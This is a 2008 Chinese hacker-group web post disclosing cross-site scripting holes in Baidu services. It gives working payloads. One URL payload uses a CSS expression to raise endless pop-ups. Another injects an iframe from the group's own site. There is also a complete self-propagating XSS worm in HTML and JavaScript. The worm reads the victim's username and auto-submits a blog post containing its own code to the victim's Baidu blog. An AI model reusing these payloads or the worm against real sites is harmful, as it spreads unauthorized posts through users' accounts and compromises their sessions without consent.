百度暴xssworm 跨站漏洞 || 中国X黑客小组


	您现在的位置：中国X黑客小组 >> 技术文章 >> 新闻中心 >> 业界动态 >> 文章正文	用户登录新用户注册

[图文]百度暴xssworm 跨站漏洞

热荐 ★★★

【字体：小大】

百度暴xssworm 跨站漏洞

作者：血腥魔术… 文章来源：本站原创点击数：更新时间：2008-7-3

http://www.baidu.com/index.php?bar=[/url]"/**/style=xss:expression(alert('xss'));

有点死循环的性质,无限弹窗.

<div id="xssworm">.
<form name="form1" id="popFormSubmit" action="" method="post">
<input type="hidden" name="ct" value="1">
<input type="hidden" name="cm" value="1">
<input type="hidden" id="url" name="spRefURL" value="">
<input type="hidden" id="title" name="spBlogTitle" value="百度又有新漏洞啦-F14r3">
<input type="hidden" id="content" name="spBlogText" value="">
<input type="hidden" name="spBlogCatName" value="默认分类">
<input type="hidden" name="spIsCmtAllow" value="1">
<input type="hidden" name="spBlogPower" value="0">
<input type="hidden" name="spVcode" value="">
<input type="hidden" name="spVerifyKey" value="">
<input type="hidden" name="tj" value=" 发表文章 " >
</form>
<script>
function $(i){return document.getElementById(i);}
window.onload = function(){
var j=document.body.innerText;
var i=j.indexOf("|");
j=j.substr(0,i);
form1.action = "http://hi.baidu.com/"+j+"/commit";
$("content").value = escape($("xssworm").outerHTML);
form1.submit();
}
</script>
</div>

跨站漏洞:

http://bk.baidu.com/s?wd=</title><iframe%20src=http://www.cnxhacker.com></iframe

文章录入：血腥魔术师责任编辑：血腥魔术师

上一篇文章：网银安全性成重点勿把所有银行卡都绑网银

下一篇文章： 6月安全专题集中营

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新热点		最新推荐		相关文章
				Apple Mac OS X CoreGraphic phpwind任意修改管理员密码漏安全杂谈：企业安全建设中的鲍尔默：微软每年至少投资25 瑞星07月25日发布每日病毒及已有黑客在研制利用DNS漏洞程腾讯官方版Linux QQ将于本月无法进入安全模式可能中招“ 瑞星公司07月15日发布每日计微软七月安全公告预告:四个重

　网友评论：（只显示最新5条。评论内容只代表网友观点，与本站立场无关！）


关于我们 - 版权声明 - 帮助(？) - 广告服务 - 联系我们 - 友情链接 - 用户注册 -	Powered by ICE RIVER - STUDIO

» CnXHacker.CoM